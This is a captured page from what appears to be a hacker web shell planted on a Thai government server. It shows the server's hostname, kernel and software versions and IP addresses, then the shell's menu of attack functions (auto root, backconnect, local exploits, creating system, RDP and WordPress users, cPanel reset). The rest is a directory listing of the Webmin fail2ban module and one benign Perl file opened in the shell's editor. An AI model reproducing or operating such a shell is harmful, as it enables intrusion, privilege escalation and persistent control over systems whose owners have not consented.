Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
fail2ban /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
110
B
-rw-r--r--
atboot.cgi
866
B
-rwxr-xr-x
backup_config.pl
718
B
-rwxr-xr-x
config
100
B
-rw-r--r--
config-debian-linux
118
B
-rw-r--r--
config-redhat-linux
118
B
-rw-r--r--
config-syno-linux
100
B
-rw-r--r--
config.info
196
B
-rw-r--r--
config.info.ca
245
B
-rw-r--r--
config.info.ca.UTF-8
249
B
-rw-r--r--
config.info.de
206
B
-rw-r--r--
config.info.de.UTF-8
206
B
-rw-r--r--
config.info.ms_MY
201
B
-rw-r--r--
config.info.ms_MY.UTF-8
201
B
-rw-r--r--
config.info.no
203
B
-rw-r--r--
config.info.no.UTF-8
203
B
-rw-r--r--
config.info.pl
226
B
-rw-r--r--
config.info.pl.UTF-8
232
B
-rw-r--r--
delete_actions.cgi
824
B
-rwxr-xr-x
delete_filters.cgi
824
B
-rwxr-xr-x
delete_jails.cgi
571
B
-rwxr-xr-x
edit_action.cgi
2.07
KB
-rwxr-xr-x
edit_config.cgi
1.62
KB
-rwxr-xr-x
edit_filter.cgi
1.62
KB
-rwxr-xr-x
edit_jail.cgi
3.85
KB
-rwxr-xr-x
edit_jaildef.cgi
2.55
KB
-rwxr-xr-x
edit_manual.cgi
1
KB
-rwxr-xr-x
fail2ban-lib.pl
13.35
KB
-rw-r--r--
index.cgi
2.04
KB
-rwxr-xr-x
install_check.pl
412
B
-rwxr-xr-x
list_actions.cgi
1.1
KB
-rwxr-xr-x
list_filters.cgi
1.15
KB
-rwxr-xr-x
list_jails.cgi
1.5
KB
-rwxr-xr-x
log_parser.pl
751
B
-rwxr-xr-x
module.info
201
B
-rw-r--r--
module.info.ca
148
B
-rw-r--r--
module.info.ca.UTF-8
161
B
-rw-r--r--
module.info.de
142
B
-rw-r--r--
module.info.de.UTF-8
154
B
-rw-r--r--
module.info.ms_MY
167
B
-rw-r--r--
module.info.ms_MY.UTF-8
179
B
-rw-r--r--
module.info.no
36
B
-rw-r--r--
module.info.no.UTF-8
42
B
-rw-r--r--
module.info.pl
153
B
-rw-r--r--
module.info.pl.UTF-8
170
B
-rw-r--r--
restart.cgi
281
B
-rwxr-xr-x
save_action.cgi
1.81
KB
-rwxr-xr-x
save_config.cgi
922
B
-rwxr-xr-x
save_filter.cgi
1.64
KB
-rwxr-xr-x
save_jail.cgi
3.66
KB
-rwxr-xr-x
save_jaildef.cgi
1.44
KB
-rwxr-xr-x
save_manual.cgi
567
B
-rwxr-xr-x
start.cgi
273
B
-rwxr-xr-x
stop.cgi
269
B
-rwxr-xr-x
syslog_logs.pl
527
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_config.cgi
#!/usr/bin/perl # Show all global config options use strict; use warnings; require './fail2ban-lib.pl'; our (%in, %text); my $conf = &get_config(); my ($def) = grep { $_->{'name'} eq 'Definition' } @$conf; $def || &error($text{'config_edef'}); &ui_print_header(undef, $text{'config_title'}, ""); print &ui_form_start("save_config.cgi", "post"); print &ui_table_start($text{'config_header'}, undef, 2); # Logging level my $loglevel = &find_value("loglevel", $def) || 3; my @loglevels; if (&compare_version_numbers(&get_fail2ban_version(), "0.9") >= 0) { @loglevels = ( "CRITICAL", "ERROR", "WARNING", "NOTICE", "INFO", "DEBUG" ); } else { @loglevels = ( [ 1, "ERROR" ], [ 2, "WARN" ], [ 3, "INFO" ], [ 4, "DEBUG" ] ); } print &ui_table_row($text{'config_loglevel'}, &ui_select("loglevel", $loglevel, \@loglevels)); # Log file my $logtarget = &find_value("logtarget", $def); my $mode = $logtarget eq "" ? "" : $logtarget =~ /^STDOUT|STDERR|SYSLOG$/ ? $logtarget : "file"; print &ui_table_row($text{'config_logtarget'}, &ui_radio("logtarget_def", $mode, [ [ "", $text{'config_default'}."<br>" ], [ "STDOUT", "STDOUT<br>" ], [ "STDERR", "STDERR<br>" ], [ "SYSLOG", $text{'config_syslog'}."<br>" ], [ "file", $text{'config_file'}." ". &ui_textbox("logtarget", $mode eq "file" ? $logtarget : "", 50) ] ])); # Socket file my $socket = &find_value("socket", $def); print &ui_table_row($text{'config_socket'}, &ui_opt_textbox("socket", $socket, 40, $text{'default'})); print &ui_table_end(); print &ui_form_end([ [ undef, $text{'save'} ] ]); &ui_print_footer("", $text{'index_return'});
Close